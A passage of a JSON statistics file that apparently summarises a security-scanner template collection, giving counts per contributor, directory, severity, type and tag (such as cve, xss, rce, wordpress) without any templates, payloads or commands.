nagli","count":2},{"name":"fabaff","count":2},{"name":"r3naissance","count":2},{"name":"swissky","count":2},{"name":"amsda","count":2},{"name":"g4l1t0","count":2},{"name":"bernardofsr","count":2},{"name":"0xsmiley","count":2},{"name":"foulenzer","count":2},{"name":"hetroublemakr","count":2},{"name":"udit_thakkur","count":2},{"name":"gevakun","count":2},{"name":"convisoappsec","count":2},{"name":"zomsop82","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"socketz","count":2},{"name":"mohammedsaneem","count":2},{"name":"manas_harsh","count":2},{"name":"kiblyn11","count":2},{"name":"joeldeleep","count":2},{"name":"0xrudra","count":2},{"name":"bp0lr","count":2},{"name":"parth","count":2},{"name":"davidmckennirey","count":2},{"name":"moritz nentwig","count":2},{"name":"johnjhacking","count":2},{"name":"cocxanh","count":2},{"name":"random-robbie","count":2},{"name":"afaq","count":2},{"name":"w4cky_","count":2},{"name":"pxmme1337","count":2},{"name":"0xsapra","count":2},{"name":"nkxxkn","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xcrypto","count":2},{"name":"ehsahil","count":2},{"name":"hahwul","count":2},{"name":"randomrobbie","count":2},{"name":"arcc","count":2},{"name":"koti2","count":2},{"name":"mass0ma","count":1},{"name":"brabbit10","count":1},{"name":"zandros0","count":1},{"name":"shifacyclewla","count":1},{"name":"sshell","count":1},{"name":"fopina","count":1},{"name":"sicksec","count":1},{"name":"bjhulst","count":1},{"name":"rotemreiss","count":1},{"name":"juicypotato1","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"evolutionsec","count":1},{"name":"jteles","count":1},{"name":"elder tao","count":1},{"name":"andirrahmani1","count":1},{"name":"jeya seelan","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"izn0u","count":1},{"name":"adrianmf","count":1},{"name":"me9187","count":1},{"name":"udyz","count":1},{"name":"dawid-czarnecki","count":1},{"name":"0xteles","count":1},{"name":"shelld3v","count":1},{"name":"rojanrijal","count":1},{"name":"alex","count":1},{"name":"thezakman","count":1},{"name":"smaranchand","count":1},{"name":"manuelbua","count":1},{"name":"affix","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"d0rkerdevil","count":1},{"name":"b0rn2r00t","count":1},{"name":"yavolo","count":1},{"name":"revblock","count":1},{"name":"_c0wb0y_","count":1},{"name":"c3l3si4n","count":1},{"name":"retr0","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"ahmetpergamum","count":1},{"name":"b4uh0lz","count":1},{"name":"52971","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sullo","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"streetofhackerr007","count":1},{"name":"fmunozs","count":1},{"name":"xstp","count":1},{"name":"_harleo","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"alperenkesk","count":1},{"name":"yashgoti","count":1},{"name":"tim_koopmans","count":1},{"name":"kre80r","count":1},{"name":"luskabol","count":1},{"name":"tirtha_mandal","count":1},{"name":"andysvints","count":1},{"name":"j33n1k4","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"omarkurt","count":1},{"name":"0xtavian","count":1},{"name":"remonsec","count":1},{"name":"qlkwej","count":1},{"name":"shreyapohekar","count":1},{"name":"pudsec","count":1},{"name":"chron0x","count":1},{"name":"x6263","count":1},{"name":"mubassirpatel","count":1},{"name":"kabirsuda","count":1},{"name":"thevillagehacker","count":1},{"name":"vzamanillo","count":1},{"name":"pratik khalane","count":1},{"name":"furkansenan","count":1},{"name":"borna nematzadeh","count":1},{"name":"its0x08","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"elmahdi","count":1},{"name":"mesaglio","count":1},{"name":"sickwell","count":1},{"name":"soyelmago","count":1},{"name":"yashanand155","count":1},{"name":"ldionmarcil","count":1},{"name":"schniggie","count":1},{"name":"ooooooo_q","count":1},{"name":"iampritam","count":1},{"name":"ilovebinbash","count":1},{"name":"bad5ect0r","count":1},{"name":"un-fmunozs","count":1},{"name":"naglinagli","count":1},{"name":"knassar702","count":1},{"name":"@dwisiswant0","count":1},{"name":"cookiehanhoan","count":1},{"name":"ohlinge","count":1},{"name":"luci","count":1},{"name":"pdp","count":1},{"name":"philippdelteil","count":1},{"name":"0ut0fb4nd","count":1},{"name":"noamrathaus","count":1},{"name":"s1r1u5_","count":1},{"name":"hakluke","count":1},{"name":"micha3lb3n","count":1},{"name":"deena","count":1},{"name":"hanlaomo","count":1},{"name":"_darrenmartyn","count":1},{"name":"absshax","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"ringo","count":1},{"name":"nerrorsec","count":1},{"name":"mhdsamx","count":1},{"name":"zhenwarx","count":1},{"name":"rodnt","count":1},{"name":"patralos","count":1},{"name":"undefl0w","count":1},{"name":"b0yd","count":1},{"name":"oscarintherocks","count":1},{"name":"berkdusunur","count":1},{"name":"whynotke","count":1},{"name":"akshansh","count":1},{"name":"aresx","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"apt-mirror","count":1},{"name":"daviey","count":1},{"name":"defr0ggy","count":1},{"name":"taielab","count":1},{"name":"blckraven","count":1},{"name":"mah3sec_","count":1},{"name":"gboddin","count":1},{"name":"akash.c","count":1},{"name":"infosecsanyam","count":1},{"name":"wabafet","count":1},{"name":"ahmed sherif","count":1},{"name":"willd96","count":1},{"name":"sy3omda","count":1},{"name":"regala_","count":1},{"name":"alph4byt3","count":1},{"name":"notsoevilweasel","count":1},{"name":"sec_hawk","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"push4d","count":1},{"name":"geraldino2","count":1},{"name":"th3.d1p4k","count":1},{"name":"0xrod","count":1},{"name":"kareemse1im","count":1},{"name":"intx0x80","count":1},{"name":"ipanda","count":1},{"name":"ajaysenr","count":1},{"name":"kurohost","count":1},{"name":"raesene","count":1},{"name":"nytr0gen","count":1},{"name":"becivells","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"toufik airane","count":1},{"name":"bolli95","count":1},{"name":"makyotox","count":1},{"name":"0h1in9e","count":1},{"name":"exploitation","count":1},{"name":"co0nan","count":1},{"name":"petruknisme","count":1},{"name":"divya_mudgal","count":1},{"name":"flag007","count":1}],"directory":[{"name":"cves","count":731},{"name":"vulnerabilities","count":307},{"name":"exposed-panels","count":250},{"name":"technologies","count":192},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":37},{"name":"network","count":33},{"name":"iot","count":25},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":650},{"name":"high","count":558},{"name":"medium","count":451},{"name":"critical","count":276},{"name":"low","count":153}],"types":[{"name":"http","count":1983},{"name":"file","count":46},{"name":"network","count":42},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":803},{"name":"lfi","count":325},{"name":"xss","count":253},{"name":"panel","count":252},{"name":"wordpress","count":241},{"name":"exposure","count":233},{"name":"rce","count":200},{"name":"tech","count":188},{"name":"wp-plugin","count":167},{"name":"cve2020","count":164},{"name":"cve2021","count":139},{"name":"joomla","count":128},{"name":"cve2010","count":108},{"name":"cve2019","count":96},{"name":"config","count":94},{"name":"cve2018","count":86},{"name":"apache","count":70},{"name":"takeover","count":68},{"name":"iot","count":66},{"name":"token","count":65},{"name":"default-login","count":64},{"name":"oob","count":57},{"name":"cve2017","count":50},{"name":"unauth","count":47},{"name":"file","count":46},{"name":"network","count":43},{"name":"ssrf","count":40},{"name":"sqli","count":38},{"name":"","count":37},{"name":"oracle","count":36},{"name":"cve2016","count":36},{"name":"redirect","count":34},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"cve2015","count":26},{"name":"auth-bypass","count":23},{"name":"generic","count":23},{"name":"misc","count":23},{"name":"disclosure","count":22},{"name":"router","count":20},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"misconfig","count":18},{"name":"debug","count":18},{"name":"cve2012","count":17},{"name":"php","count":16},{"name":"cve2011","count":15},{"name":"struts","count":14},{"name":"weblogic","count":14},{"name":"cve2009","count":14},{"name":"login","count":14},{"name":"fuzz","count":14},{"name":"android","count":13},{"name":"adobe","count":13},{"name":"devops","count":13},{"name":"dns","count":13},{"name":"zoho","count":13},{"name":"aws","count":12},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"dlink","count":12},{"name":"wp-theme","count":11},{"name":"cve2013","count":11},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"intrusive","count":9},{"name":"magento","count":9},{"name":"gitlab","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"nginx","count":8},{"name":"rails","count":8},{"name":"scada","count":8},{"name":"cve2008","count":8},{"name":"ruijie","count":8},{"name":"cms","count":7},{"name":"files","count":7},{"name":"kubernetes","count":7},{"name":"backup","count":7},{"name":"microsoft","count":7},{"name":"ibm","count":7},{"name":"confluence","count":7},{"name":"netgear","count":7},{"name":"coldfusion","count":7},{"name":"google","count":7},{"name":"solr","count":6},{"name":"citrix","count":6},{"name":"hp","count":6},{"name":"docker","count":6},{"name":"api","count":6},{"name":"rconfig","count":6},{"name":"laravel","count":6},{"name":"jetty","count":6},{"name":"camera","count":6},{"name":"django","count":6},{"name":"dedecms","count":5},{"name":"headless","count":5},{"name":"printer","count":5},{"name":"circarlife","count":5},{"name":"fileupload","count":5},{"name":"java","count":5},{"name":"windows","count":5},{"name":"tomcat","count":5},{"name":"deserialization","count":5},{"name":"nodejs","count":5},{"name":"iis","count":5},{"name":"drupal","count":5},{"name":"jolokia","count":5},{"name":"phpmyadmin","count":5},{"name":"lucee","count":5},{"name":"ssti","count":5},{"name":"wso2","count":4},{"name":"zimbra","count":4},{"name":"asp","count":4},{"name":"zabbix","count":4},{"name":"firmware","count":4},{"name":"resin","count":4},{"name":"artifactory","count":4},{"name":"grafana","count":4},{"name":"traversal","count":4},{"name":"strapi","count":4},{"name":"webserver","count":4},{"name":"symantec","count":4},{"name":"proxy","count":4},{"name":"thinkphp","count":4},{"name":"symfony","count":4},{"name":"hongdian","count":4},{"name":"solarwinds","count":4},{"name":"thinkcmf","count":4},{"name":"vpn","count":4},{"name":"magmi","count":4},{"name":"exchange","count":4},{"name":"glpi","count":4},{"name":"buffalo","count":4},{"name":"samsung","count":4},{"name":"elastic","count":4},{"name":"crlf","count":4},{"name":"moodle","count":4},{"name":"rfi","count":4},{"name":"git","count":4},{"name":"log","count":3},{"name":"springcloud","count":3},{"name":"mail","count":3},{"name":"jellyfin","count":3},{"name":"fanruan","count":3},{"name":"nosqli","count":3},{"name":"openssh","count":3},{"name":"httpd","count":3},{"name":"smtp","count":3},{"name":"fpd","count":3},{"name":"tikiwiki","count":3},{"name":"linkerd","count":3},{"name":"bigip","count":3},{"name":"bitrix","count":3},{"name":"kafka","count":3},{"name":"nacos","count":3},{"name":"opensis","count":3},{"name":"backdoor","count":3},{"name":"zhiyuan","count":3},{"name":"ssh","count":3},{"name":"hoteldruid","count":3},{"name":"backups","count":3},{"name":"slack","count":3},{"name":"druid","count":3},{"name":"kevinlab","count":3},{"name":"mongodb","count":3},{"name":"cacti","count":3},{"name":"nexus","count":3},{"name":"fatpipe","count":3},{"name":"telerik","count":3},{"name":"itop","count":3},{"name":"prometheus","count":3},{"name":"ebs","count":3},{"name":"lfr","count":3},{"name":"npm","count":3},{"name":"cve2007","count":3},{"name":"oa","count":3},{"name":"r-seenet","count":3},{"name":"jeesns","count":3},{"name":"vbulletin","count":3},{"name":"microstrategy","count":3},{"name":"caucho","count":3},{"name":"targa","count":3},{"name":"amazon","count":3},{"name":"openam","count":3},{"name":"azure","count":3},{"name":"injection","count":3},{"name":"firebase","count":3},{"name":"ofbiz","count":3},{"name":"terramaster","count":3},{"name":"kibana","count":3},{"name":"frp","count":2},{"name":"rstudio","count":2},{"name":"chamilo","count":2},{"name":"sonicwall","count":2},{"name":"service","count":2},{"name":"cve2005","count":2},{"name":"phpcollab","count":2},{"name":"tidb","count":2},{"name":"payara","count":2},{"name":"linux","count":2},{"name":"kentico","count":2},{"name":"akkadian","count":2},{"name":"smb","count":2},{"name":"hasura","count":2},{"name":"paloalto","count":2},{"name":"splunk","count":2},{"name":"mcafee","count":2},{"name":"natshell","count":2},{"name":"hashicorp","count":2},{"name":"webcam","count":2},{"name":"xxljob","count":2},{"name":"waf","count":2},{"name":"pega","count":2},{"name":"jeedom","count":2},{"name":"getsimple","count":2},{"name":"minio","count":2},{"name":"aviatrix","count":2},{"name":"hpe","count":2},{"name":"flir","count":2},{"name":"vrealize","count":2},{"name":"hjtcloud","count":2},{"name":"trixbox","count":2},{"name":"emerge","count":2},{"name":"qcubed","count":2},{"name":"akamai","count":2},{"name":"saltstack","count":2},{"name":"axis","count":2},{"name":"netis","count":2},{"name":"ecoa","count":2},{"name":"enumeration","count":2},{"name":"bucket","count":2},{"name":"sitecore","count":2},{"name":"nagios","count":2},{"name":"activemq","count":2},{"name":"hostheader-injection","count":2},{"name":"bypass","count":2},{"name":"avantfax","count":2},{"name":"icewarp","count":2},{"name":"ec2","count":2},{"name":"maian","count":2},{"name":"sharepoint","count":2},{"name":"horde","count":2},{"name":"glassfish","count":2},{"name":"huawei","count":2},{"name":"oauth","count":2},{"name":"commax","count":2},{"name":"leak","count":2},{"name":"axis2","count":2},{"name":"showdoc","count":2},{"name":"dos","count":2},{"name":"sonarqube","count":2},{"name":"storage","count":2},{"name":"adminer","count":2},{"name":"openfire","count":2},{"name":"netsweeper","count":2},{"name":"cache","count":2},{"name":"idrac","count":2},{"name":"chiyu","count":2},{"name":"igs","count":2},{"name":"mida","count":2},{"name":"liferay","count":2},{"name":"rockmongo","count":2},{"name":"vcenter","count":2},{"name":"github","count":2},{"name":"harbor","count":2},{"name":"jsf","count":2},{"name":"middleware","count":2},{"name":"yii","count":2},{"name":"aruba","count":2},{"name":"wordfence","count":2},{"name":"guacamole","count":2},{"name":"nextjs","count":2},{"name":"totemomail","count":2},{"name":"seeyon","count":2},{"name":"grav","count":2},{"name":"status","count":2},{"name":"plesk","count":2},{"name":"dolibarr","count":2},{"name":"geowebserver","count":2},{"name":"prestashop","count":2},{"name":"openvpn","count":2},{"name":"odoo","count":2},{"name":"wuzhicms","count":2},{"name":"kong","count":2},{"name":"globalprotect","count":2},{"name":"jboss","count":2},{"name":"keycloak","count":2},{"name":"favicon","count":2},{"name":"nextcloud","count":2},{"name":"couchdb","count":2},{"name":"chyrp","count":2},{"name":"yapi","count":2},{"name":"spark","count":2},{"name":"fortios","count":2},{"name":"ucmdb","count":2},{"name":"voipmonitor","count":2},{"name":"shellshock","count":2},{"name":"prtg","count":2},{"name":"ecology","count":2},{"name":"db","count":2},{"name":"ilo","count":2},{"name":"node","count":2},{"name":"bruteforce","count":2},{"name":"sar2html","count":1},{"name":"actuator","count":1},{"name":"zms","count":1},{"name":"whm","count":1},{"name":"alerta","count":1},{"name":"razor","count":1},{"name":"motorola","count":1},{"name":"rdp","count":1},{"name":"plone","count":1},{"name":"netmask","count":1},{"name":"monitorr","count":1},{"name":"pulsesecure","count":1},{"name":"emc","count":1},{"name":"gitea","count":1},{"name":"shoretel","count":1},{"name":"anchorcms","count":1},{"name":"drone","count":1},{"name":"fortigate","count":1},{"name":"basic-auth","count":1},{"name":"sage","count":1},{"name":"openrestry","count":1},{"name":"gilacms","count":1},{"name":"rabbitmq","count":1},{"name":"karel","count":1},{"name":"appweb","count":1},{"name":"krweb","count":1},{"name":"h3c-imc","count":1},{"name":"sarg","count":1},{"name":"pyramid","count":1},{"name":"zarafa","count":1},{"name":"javamelody","count":1},{"name":"qvisdvr","count":1},{"name":"chevereto","count":1},{"name":"gunicorn","count":1},{"name":"couchbase","count":1},{"name":"finereport","count":1},{"name":"vscode","count":1},{"name":"iceflow","count":1},{"name":"bullwark","count":1},{"name":"k8","count":1},{"name":"pagespeed","count":1},{"name":"werkzeug","count":1},{"name":"ns","count":1},{"name":"keenetic","count":1},{"name":"rmc","count":1},{"name":"achecker","count":1},{"name":"gateone","count":1},{"name":"powercreator","count":1},{"name":"selea","count":1},{"name":"tamronos","count":1},{"name":"blackboard","count":1},{"name":"oidc","count":1},{"name":"websphere","count":1},{"name":"labtech","count":1},{"name":"saltapi","count":1},{"name":"exposures","count":1},{"name":"memcached","count":1},{"name":"rsyncd","count":1},{"name":"database","count":1},{"name":"ewebs","count":1},{"name":"timeclock","count":1},{"name":"owa","count":1},{"name":"thinkadmin","count":1},{"name":"emby","count":1},{"name":"flink","count":1},{"name":"rocketchat","count":1},{"name":"alertmanager","count":1},{"name":"asus","count":1},{"name":"exponentcms","count":1},{"name":"graylog","count":1},{"name":"gstorage","count":1},{"name":"nedi","count":1},{"name":"phpunit","count":1},{"name":"perl","count":1},{"name":"optiLink","count":1},{"name":"szhe","count":1},{"name":"fastcgi","count":1},{"name":"cherokee","count":1},{"name":"adb","count":1},{"name":"kerbynet","count":1},{"name":"fortiweb","count":1},{"name":"panasonic","count":1},{"name":"woocomernce","count":1},{"name":"opentsdb","count":1},{"name":"cve2006","count":1},{"name":"websvn","count":1},{"name":"nuuo","count":1},{"name":"lotus","count":1},{"name":"lanproxy","count":1},{"name":"74cms","count":1},{"name":"dvwa","count":1},{"name":"phpinfo","count":1},{"name":"fortigates","count":1},{"name":"webmin","count":1},{"name":"viewpoint","count":1},{"name":"doh","count":1},{"name":"mobileiron","count":1},{"name":"olivetti","count":1},{"name":"episerver","count":1},{"name":"javascript","count":1},{"name":"zyxel","count":1},{"name":"xunchi","count":1},{"name":"mysql","count":1},{"name":"extractor","count":1},{"name":"huijietong","count":1},{"name":"cgi","count":1},{"name":"ognl","count":1},{"name":"lotuscms","count":1},{"name":"uwsgi","count":1},{"name":"gurock","count":1},{"name":"scimono","count":1},{"name":"zte","count":1},{"name":"jaspersoft","count":1},{"name":"nomad","count":1},{"name":"ioncube","count":1},{"name":"ueditor","count":1},{"name":"bazarr","count":1},{"name":"landrayoa","count":1},{"name":"sentry","count":1},{"name":"plc","count":1},{"name":"etherpad","count":1},{"name":"totaljs","count":1},{"name":"webmodule-ee","count":1},{"name":"zenario","count":1},{"name":"sgp","count":1},{"name":"varnish","count":1},{"name":"gloo","count":1},{"name":"yachtcontrol","count":1},{"name":"jsp","count":1},{"name":"faraday","count":1},{"name":"metinfo","count":1},{"name":"sidekiq","count":1},{"name":"zm","count":1},{"name":"burp","count":1},{"name":"goahead","count":1},{"name":"salesforce","count":1},{"name":"robomongo","count":1},{"name":"dnssec","count":1},{"name":"checkpoint","count":1},{"name":"livezilla","count":1},{"name":"maxsite","count":1},{"name":"azkaban","count":1},{"name":" default-login","count":1},{"name":"influxdb","count":1},{"name":"csrf","count":1},{"name":"clusterengine","count":1},{"name":"redcap","count":1},{"name":"nimble","count":1},{"name":"shopizer","count":1},{"name":"spidercontrol","count":1},{"name":"pihole","count":1},{"name":"graphql","count":1},{"name":"elascticsearch","count":1},{"name":"camunda","count":1},{"name":"webadmin","count":1},{"name":"email","count":1},{"name":"dotclear","count":1},{"name":"phpfastcache","count":1},{"name":"bigbluebutton","count":1},{"name":"spectracom","count":1},{"name":"discourse","count":1},{"name":"resourcespace","count":1},{"name":"traefik","count":1},{"name":"rhymix","count":1},{"name":"kubeflow","count":1},{"name":"visualtools","count":1},{"name":"kindeditor","count":1},{"name":"okta","count":1},{"name":"panos","count":1},{"name":"tensorflow","count":1},{"name":"opencast","count":1},{"name":"bolt","count":1},{"name":"avalanche","count":1},{"name":"luftguitar","count":1},{"name":"centreon","count":1},{"name":"bash","count":1},{"name":"openx","count":1},{"name":"zend","count":1},{"name":"tileserver","count":1},{"name":"subrion","count":1},{"name":"myucms","count":1},{"name":"nps","count":1},{"name":"clockwork","count":1},{"name":"javafaces","count":1},{"name":"cse","count":1},{"name":"argussurveillance","count":1},{"name":"tenda","count":1},{"name":"blue-ocean","count":1},{"name":"zookeeper","count":1},{"name":"cors","count":1},{"name":"glowroot","count":1},{"name":"zzzcms","count":1},{"name":"portainer","count":1},{"name":"sql","count":1},{"name":"smartsense","count":1},{"name":"svn","count":1},{"name":"frontpage","count":1},{"name":"xmlchart","count":1},{"name":"mirai","count":1},{"name":"blind","count":1},{"name":"k8s","count":1},{"name":"testrail","count":1},{"name":"jmx","count":1},{"name":"xvr","count":1},{"name":"opm","count":1},{"name":"darkstat","count":1},{"name":"weiphp","count":1},{"name":"postmessage","count":1},{"name":"owasp","count":1},{"name":"b2evolution","count":1},{"name":"dotnetnuke","count":1},{"name":"beanstalk","count":1},{"name":"phalcon","count":1},{"name":"domxss","count":1},{"name":"pcoip","count":1},{"name":"mantis","count":1},{"name":"omi","count":1},{"name":"qsan","count":1},{"name":"etouch","count":1},{"name":"rmi","count":1},{"name":"artica","count":1},{"name":"fortinet","count":1},{"name":"commscope","count":1},{"name":"dbeaver","count":1},{"name":"turbocrm","count":1},{"name":"sourcebans","count":1},{"name":"eyelock","count":1},{"name":"minimouse","count":1},{"name":"dotnet","count":1},{"name":"moinmoin","count":1},{"name":"craftcms","count":1},{"name":"oneblog","count":1},{"name":"aspnuke","count":1},{"name":"froxlor","count":1},{"name":"cocoon","count":1},{"name":"geddy","count":1},{"name":"ssltls","count":1},{"name":"openstack","count":1},{"name":"comodo","count":1},{"name":"nexusdb","count":1},{"name":"tapestry","count":1},{"name":"apos","count":1},{"name":"codeigniter","count":1},{"name":"aura","count":1},{"name":"octobercms","count":1},{"name":"kafdrop","count":1},{"name":"solarlog","count":1},{"name":"woocommerce","count":1},{"name":"eprints","count":1},{"name":"erp-nc","count":1},{"name":"rujjie","count":1},{"name":"gespage","count":1},{"name":"mariadb","count":1},{"name":"linksys","count":1},{"name":"circontrol","count":1},{"name":"timesheet","count":1},{"name":"alibaba","count":1},{"name":"xampp","count":1},{"name":"tika","count":1},{"name":"upnp","count":1},{"name":"cloudinary","count":1},{"name":"ganglia","count":1},{"name":"glances","count":1},{"name":"biometrics","count":1},{"name":"seacms","count":1},{"name":"terraform","count":1},{"name":"spip","count":1},{"name":"announcekit","count":1},{"name":"nordex","count":1},{"name":"simplecrm","count":1},{"name":"xiuno","count":1},{"name":"sceditor","count":1},{"name":"eg","count":1},{"name":"st","count":1},{"name":"jenzabar","count":1},{"name":"wazuh","count":1},{"name":"sureline","count":1},{"name":"tensorboard","count":1},{"name":"gridx","count":1},{"name":"klog","count":1},{"name":"fuelcms","count":1},{"name":"mediumish","count":1},{"name":"lighttpd","count":1},{"name":"qdpm","count":1},{"name":"scs","count":1},{"name":"expn","count":1},{"name":"acexy","count":1},{"name":"sangfor","count":1},{"name":"plugin","count":1},{"name":"wifisky","count":1},{"name":"tectuus","count":1},{"name":"ruby","count":1},{"name":"ruckus","count":1},{"name":"clockwatch","count":1},{"name":"octoprint","count":1},{"name":"netdata","count":1},{"name":"monitorix","count":1},{"name":"pgadmin","count":1},{"name":"clave","count":1},{"name":"elfinder","count":1},{"name":"upload","count":1},{"name":"gsoap","count":1},{"name":"vnc","count":1},{"name":"diris","count":1},{"name":"chinaunicom","count":1},{"name":"mautic","count":1},{"name":"redhat","count":1},{"name":"tjws","count":1},{"name":"redwood","count":1},{"name":"ghost","count":1},{"name":"panabit","count":1},{"name":"esmtp","count":1},{"name":"zmanda","count":1},{"name":"vsphere","count":1},{"name":"clink-office","count":1},{"name":"skywalking","count":1},{"name":"feifeicms","count":1},{"name":"xdcms","count":1},{"name":"ambari","count":1},{"name":"phpwiki","count":1},{"name":"socomec","count":1},{"name":"novnc","count":1},{"name":"lg-nas","count":1},{"name":"redis","count":1},{"name":"haproxy","count":1},{"name":"logontracer","count":1},{"name":"cockpit","count":1},{"name":"pippoint","count":1},{"name":"shiro","count":1},{"name":"servicenow","count":1},{"name":"elasticsearch","count":1},{"name":"soar","count":1},{"name":"tpshop","count":1},{"name":"tracer","count":1},{"name":"addpac","count":1},{"name":"accela","count":1},{"name":"linkedin","count":1},{"name":"nc2","count":1},{"name":"landray","count":1},{"name":"shopxo","count":1},{"name":"ilo4","count":1},{"name":"trane","count":1},{"name":"nette","count":1},{"name":"jeewms","count":1},{"name":"parentlink","count":1},{"name":"vidyo","count":1},{"name":"postgres","count":1},{"name":"crm","count":1},{"name":"webftp","count":1},{"name":"svnserve","count":1},{"name":"spf","count":1},{"name":"ems","count":1},{"name":"miscrsoft","count":1},{"name":"iptime","count":1},{"name":"springframework","count":1},{"name":"node-red-dashboard","count":1},{"name":"wmt","count":1},{"name":"mongo","count":1},{"name":"apiman","count":1},{"name":"swagger","count":1},{"name":"gogs","count":1},{"name":"hiboss","count":1},{"name":"mailchimp","count":1},{"name":"vsftpd","count":1},{"name":"maccmsv10","count":1},{"name":"avtech","count":1},{"name":"opensmtpd","count":1},{"name":"metabase","count":1},{"name":"dompdf","count":1},{"name":"shoppable","count":1},{"name":"office365","count":1},{"name":"wildfly","count":1},{"name":"beanshell","count":1},{"name":"jenkin","count":1},{"name":"gitlist","count":1},{"name":"sprintful","count":1},{"name":"dom","count":1},{"name":"listserv","count":1},{"name":"nuxeo","count":1},{"name":"jfrog","count":1},{"name":"ulterius","count":1},{"name":"duomicms","count":1},{"name":"acme","count":1},{"name":"pmb","count":1},{"name":"dvr","count":1},{"name":"smi","count":1},{"name":"redmine","count":1},{"name":"synnefo","count":1},{"name":"circontrorl","count":1},{"name":"cloudron","count":1},{"name":"primetek","count":1},{"name":"wamp","count":1},{"name":"ricoh","count":1},{"name":"hiawatha","count":1},{"name":"triconsole","count":1},{"name":"geutebruck","count":1},{"name":"realteo","count":1},{"name":"smartblog","count":1},{"name":"fedora","count":1},{"name":"cerebro","count":1},{"name":"shopware","count":1},{"name":"cloudflare","count":1},{"name":"bookstack","count":1},{"name":"cscart","count":1},{"name":"openemr","count":1},{"name":"xml","count":1},{"name":"zeroshell","count":1},{"name":"embedthis","count":1},{"name":"expressjs","count":1},{"name":"yealink","count":1},{"name":"solman","count":1},{"name":"myvuehelp","count":1},{"name":"nweb2fax","count":1},{"name":"rubedo","count":1},{"name":"spring","count":1},{"name":"cyberoam","count":1},{"name":"wooyun","count":1},{"name":"visionhub","count":1},{"name":"starttls","count":1},{"name":"sqlite","count":1},{"name":"phpfusion","count":1},{"name":"pacsone","count":1},{"name":"floc","count":1},{"name":"auth","count":1},{"name":"gotmls","count":1},{"name":"wiki","count":1},{"name":"codemeter","count":1},{"name":"sophos","count":1},{"name":"imap","count":1},{"name":"trilithic","count":1},{"name":"stem","count":1},{"name":"lutron","count":1},{"name":"nsasg","count":1},{"name":"lancom","count":1},{"name":"fastapi","count":1},{"name":"rockethchat","count":1},{"name":"mantisbt","count":1},{"name":"mongoshake","count":1},{"name":"ecom","count":1},{"name":"api-manager","count":1},{"name":"nifi","count":1},{"name":"tieline","count":1},{"name":"lansweeper","count":1},{"name":"cofax","count":1},{"name":"mdb","count":1},{"name":"csod","count":1},{"name":"eyou","count":1},{"name":"plastic","count":1},{"name":"mara","count":1},{"name":"s3","count":1},{"name":"grails","count":1},{"name":"acontent","count":1},{"name":"processmaker","count":1},{"name":"cobub","count":1},{"name":"calendarix","count":1},{"name":"hadoop","count":1},{"name":"tongda","count":1},{"name":"zcms","count":1},{"name":"exacqvision","count":1},{"name":"idemia","count":1},{"name":"default","count":1},{"name":"interlib","count":1},{"name":"opensns","count":1},{"name":"wavlink","count":1},{"name":"discord","count":1},{"name":"fortilogger","count":1},{"name":"meraki","count":1},{"name":"twitter-server","count":1},{"name":"mrtg","count":1},{"name":"daybyday","count":1},{"name":"expose","count":1},{"name":"jquery","count":1},{"name":"tor","count":1},{"name":"servicedesk","count":1},{"name":"ntopng","count":1},{"name":"phpshowtime","count":1},{"name":"oscommerce","count":1},{"name":"heroku","count":1},{"name":"magicflow","count":1},{"name":"openerp","count":1},{"name":"webui","count":1},{"name":"bedita","count":1},{"name":"mpsec","count":1},{"name":"bitly","count":1},{"name":"viewlinc","count":1},{"name":"concrete","count":1},{"name":"proftpd","count":1},{"name":"clickhouse","count":1},{"name":"wavemaker","count":1},{"name":"sco","count":1},{"name":"jnoj","count":1},{"name":"natemail","count":1},{"name":"arl","count":1},{"name":"netrc","count":1},{"name":"tcexam","count":1},{"name":"kyan","count":1},{"name":"wondercms","count":1},{"name":"empirecms","count":1},{"name":"wing-ftp","count":1},{"name":"graphite","count":1},{"name":"moin","count":1},{"name":"fiori","count":1},{"name":"setup","count":1},{"name":"jitsi","count":1},{"name":"htmli","count":1},{"name":"centos","count":1},{"name":"hortonworks","count":1},{"name":"majordomo2","count":1},{"name":"ssl","count":1},{"name":"netgenie","count":1}],"authors":[{"name":"daffainfo","count":280},{"name":"pikpikcu","count":276},{"name":"dhiyaneshdk","count":268},{"name":"pdteam","count":199},{"name":"geeknik","count":154},{"name":"dwisiswant0","count":131},{"name":"gy741","count":77},{"name":"pussycat0x","count":70},{"name":"princechaddha","count":62},{"name":"madrobot","count":61},{"name":"0x_akoko","count":43},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"melbadry9","count":9},{"name":"nadino","count":9},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":